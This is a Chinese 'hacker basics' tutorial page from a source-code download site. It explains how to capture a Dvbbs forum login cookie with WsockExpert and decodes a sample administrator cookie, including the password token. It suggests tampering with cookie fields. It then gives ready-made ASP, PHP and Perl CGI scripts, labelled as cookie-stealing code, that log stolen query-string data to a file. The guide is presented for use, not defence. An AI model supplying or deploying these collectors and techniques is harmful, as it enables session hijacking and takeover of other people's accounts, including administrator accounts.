首 页 ┆ 源码下载 ┆ IT学院 ┆ 字体下载 ┆ 模板下载 ┆ 源码发布 ┆ 广告合作 ┆ 网站地图
► 设为首页
► 加入收藏
► 联系我们
源码下载 >> ASP源码 | PHP源码 | ASP.net源码 | JSP源码 | CGI源码 | VC/C++源码 | VB源码 | Delphi源码 | Flash源码
文章学院 >> 网络编程 | 网页设计 | 图形图象 | 数据库 | 服务器 | 网络媒体 | 网络安全 | 操作系统 | 办公软件 | 软件开发 | 黑客知识
字体下载 >> 精制字体 | 非英字体 | 艺术字体 | 著名字体 | 哥特式 | 简单字体 | 手写体 | 节假日 | 图案字体 | 精度像素 | 中文字体
模板下载 >> 企业门户 | 数码网络 | 休闲娱乐 | 影视音乐 | 旅游名胜 | 文化艺术 | 电子商务 | 个性展示 | 登陆导航 | Flash模板
►►您当前的位置:源码园 → IT学院 → 黑客知识 → 黑客入门 → 文章内容

教你怎样从cookie里获取信息--cookie,获取,信息

作者:佚名  来源:网上收集  发布时间:2006-5-11 19:27:26
网站安全版有人在问,怎么从cookies中提取信息,我用动网论坛的来说明一下。

   使用工具:
1:WsockExpert,用来抓取cookies。
2:动网论坛7.1 sp1。
抓取cookies步骤:打开动网论坛的页面,用户登陆以后,打开WsockExpert后点击“打开进程“,选择ie中的动网论坛的页面,然后再到动网页面中随便点击一个版块,这时候WsockExpert中就有显示了。

其中cookies信息是
DvForum=userid=1&usercookies=0&userhidden=2&password=ChXJBnM9970wE067&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=4517632; ASPSESSIONIDCATCRCBA=KLOBIMEDCHPOEKGAHMLPBLJK; upNum=0

参数说明
DvForum是动网论坛。
userid=1表示你的用户名的id是1,也就是这个论坛的第1个用户。
userhidden如果是1表示隐身,2表示上线。
Password这里是ChXJBnM9970wE067,并不是真正登陆密码的md5加密以后的值。ChXJBnM9970wE067其实就是数据库中的TruePassWord中的值。有些获取的cookies中这里可能是明文密码或者是md5加密以后的密码,能不能破解就看你的运气了。
userclass=%B9%DC%C0%ED%D4%B1,表示用户级别是管理员,当然其它的级别也是同样的原理。
username=admin就不用我说了吧。
upNum=0表示你上传的文件数量,如果每天上传数量有限制的话,修改这里可能有些cookies会有效的。

修改cookies的工具: minibrowser等可以修改cookies的工具。

盗取cookies的asp代码
set lP=server.createObject("Adodb.Stream")
lP.Open
lP.Type=2
lP.CharSet="gb2312"
lP.writetext request.Servervariables("QUERY_STRING")
lP.SaveToFile server.mappath(strfilename),2        
lP.Close
set lP=nothing
%>

盗取cookies的php代码
<?php
$info = getenv("QUERY_STRING");
if ($info) {
$info=urldecode($info);
$fp = fopen("info.txt","a");
fwirte($fp,$info."\n\n\n\n");
fclose($fp);
}
?>

盗取cookies的cgi代码
#!/usr/bin/perl
# evil_cookie_logger.cgi
# remote cookie logging CGI coded by BrainRawt
#
# NOTE: coded as a proof of concept script when testing for
# cross-site scripting vulnerabilities.
#玄猫摘自http://www.infosecurity.org.cn/c ... ticle0128051326.htm

$borrowed_info = $ENV{'QUERY_STRING'};
$borrowed_info =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;

open(EVIL_COOKIE_LOG, ">>evil_cookie_log") or print "Content-type:
text/html\n\n something went wrong\n";
print EVIL_COOKIE_LOG "$borrowed_info\n";
print "Content-type: text/html\n\n";
close(EVIL_COOKIE_LOG);
[] [返回上一页] [打 印]
  • 上一篇文章:正确的4种挂马方式--挂马
  • 下一篇文章:破解网页鼠标右键被禁用的最新方法--破解,网页,鼠标,右键,禁用

  • 相关文章:
  • [图文]教你怎样从cookie里获取信息--cookie,获取,信...
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 源码发布
Copyright © 2003-2009 Ymyasp.Com. All Rights Reserved .
备案序号:粤ICP备07029071号